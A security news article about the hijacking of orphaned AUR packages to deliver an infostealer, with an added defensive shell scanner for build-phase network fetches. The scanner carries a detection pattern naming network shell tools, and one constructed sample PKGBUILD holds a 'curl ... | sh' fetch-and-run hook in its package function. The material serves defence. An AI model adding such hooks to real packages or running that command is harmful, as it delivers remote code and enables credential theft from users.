
400+ AUR Packages Hijacked via Orphaned Maintainers in Atomic Arch Campaign
Over 400 AUR packages were silently repurposed after attackers adopted them as orphans, delivering a targeted infostealer without exploiting any code flaw. The operation exposes a persistent gap in community repository governance: orphan adoption favours convenience over verifiable supply-chain integrity. Cleanup demands more than uninstalling the affected packages.
The compromise exploited AUR's open adoption model for orphaned packages rather than any breach of Arch infrastructure. Attackers spoofed git author metadata to appear as the prior maintainers, then injected build hooks into the PKGBUILDs that fetched a malicious npm package at build time; anything downloaded from inside a build function is not covered by makepkg's source checksums. The resulting ELF binary exfiltrates browser tokens, SSH keys, GitHub credentials, and Vault secrets to temp.sh and uses Tor for command and control. Independent analysis by Whanos [3] confirmed that the payload installs systemd persistence and, once it obtains root, uses pinned BPF maps to hide its processes. Removing the packages therefore leaves work behind: the systemd units and the maps pinned under /sys/fs/bpf have to be found and removed separately, and every credential the stealer could reach (browser tokens, SSH keys, GitHub and Vault secrets) should be treated as compromised and rotated.
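The attack vector above is a network fetch inside a PKGBUILD build function, which makepkg's checksum arrays never see. The following is an added example, not code from the article, Arch Linux, Sonatype or Whanos: a POSIX shell scanner that walks the build-phase functions of a PKGBUILD and flags commands that pull code at build time, run here against two constructed PKGBUILDs (a normal one and one carrying a hook of the shape described). The function names, the command pattern and both sample files are assumptions made for the example.

```shell
#!/bin/sh
# Added example for this article; not code from Arch Linux, Sonatype or Whanos.
# Flags build-time network fetches in an AUR PKGBUILD. Entries in source=() are
# verified by makepkg against the checksum arrays; a command inside
# prepare()/build()/check()/package() that downloads code is not, which is the
# slot a build hook of the kind described above occupies. The function names,
# the command pattern and both sample PKGBUILDs below are constructed.

# scan_pkgbuild FILE
# Prints "function:line: text" for each build-phase line that runs a known
# network-fetching command. Returns 0 when nothing was flagged, 1 otherwise.
# Legitimate packages sometimes do this too (npm/cargo dependency fetches), so
# a hit means "read this before building", not "malicious".
scan_pkgbuild() {
    hits=$(awk '
        BEGIN {
            # The command must start a word, so "libcurl" does not match.
            re = "(^|[^A-Za-z0-9_./-])(curl|wget|npx|ncat|socat"
            re = re "|npm[ \t]+(install|i|ci|exec)|pip3?[ \t]+install"
            re = re "|git[ \t]+clone|base64[ \t]+(-d|--decode))([ \t]|$|[;|&)])"
            re = re "|/dev/tcp/"
        }
        # Entering a build-phase function; split packages use package_name().
        /^[ \t]*(prepare|build|check|package|pkgver)(_[A-Za-z0-9_.+-]*)?[ \t]*\(\)/ {
            name = $1; sub(/[ \t]*\(\).*/, "", name); infunc = 1; next
        }
        # PKGBUILD convention: the closing brace of a function sits in column 0.
        infunc && /^}/ { infunc = 0; next }
        infunc && !/^[ \t]*#/ && $0 ~ re { print name ":" NR ": " $0 }
    ' "$1")
    if [ -n "$hits" ]; then
        printf '%s\n' "$hits"
        return 1
    fi
    return 0
}

# hit_count FILE: number of flagged lines, for scripting around the scanner.
hit_count() {
    scan_pkgbuild "$1" | grep -c . || true
}

# Constructed sample: the shape of an ordinary source-built AUR package.
CLEAN_PKGBUILD=$(mktemp)
cat > "$CLEAN_PKGBUILD" <<'EOF'
pkgname=example-tool
pkgver=1.2.3
pkgrel=1
arch=('x86_64')
source=("https://example.invalid/example-tool-$pkgver.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')

build() {
    cd "example-tool-$pkgver"
    ./configure --prefix=/usr --with-libcurl
    make
}

package() {
    cd "example-tool-$pkgver"
    make DESTDIR="$pkgdir" install
}
EOF

# Constructed sample of the pattern the article describes: the same package
# after a hostile "maintainer" added hooks that fetch code outside source=().
HOOKED_PKGBUILD=$(mktemp)
cat > "$HOOKED_PKGBUILD" <<'EOF'
pkgname=example-tool
pkgver=1.2.3
pkgrel=2
arch=('x86_64')
source=("https://example.invalid/example-tool-$pkgver.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')

prepare() {
    cd "example-tool-$pkgver"
    # a comment mentioning curl is not a hit
    npm install --silent some-helper >/dev/null 2>&1
}

build() {
    cd "example-tool-$pkgver"
    ./configure --prefix=/usr
    make
}

package() {
    cd "example-tool-$pkgver"
    make DESTDIR="$pkgdir" install
    curl -fsSL https://example.invalid/post-install.sh | sh
}
EOF
trap 'rm -f "$CLEAN_PKGBUILD" "$HOOKED_PKGBUILD"' EXIT

for f in "$CLEAN_PKGBUILD" "$HOOKED_PKGBUILD"; do
    if scan_pkgbuild "$f"; then
        echo "$f: no build-phase network fetches"
    else
        echo "$f: $(hit_count "$f") line(s) to review before running makepkg"
    fi
done
```

Run it over a freshly pulled AUR checkout before `makepkg`, ideally together with `git diff` against the last revision you built, since a hook added by a new adopter shows up as a diff in exactly these functions. The scanner is deliberately a review aid rather than a verdict: it ignores comments and only covers the build-phase functions, and it will flag genuine dependency fetches, which still deserve a look because they also bypass the checksums.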
Arch Linux Trusted Users have proposed AUR adoption policy changes, due by July 20, that would require a 90-day inactivity timeout before an orphaned package can be adopted; so far the change has been implemented for less than 40 percent of existing packages [2].
Sources (3)
- [1] Sonatype, Atomic Arch Campaign Analysis (https://blog.sonatype.com/atomic-arch-campaign)
- [2] Arch Linux aur-general Mailing List Thread (https://lists.archlinux.org/pipermail/aur-general/)
- [3] Whanos, Reverse Engineering of deps Payload (https://whanos.dev/deps-analysis)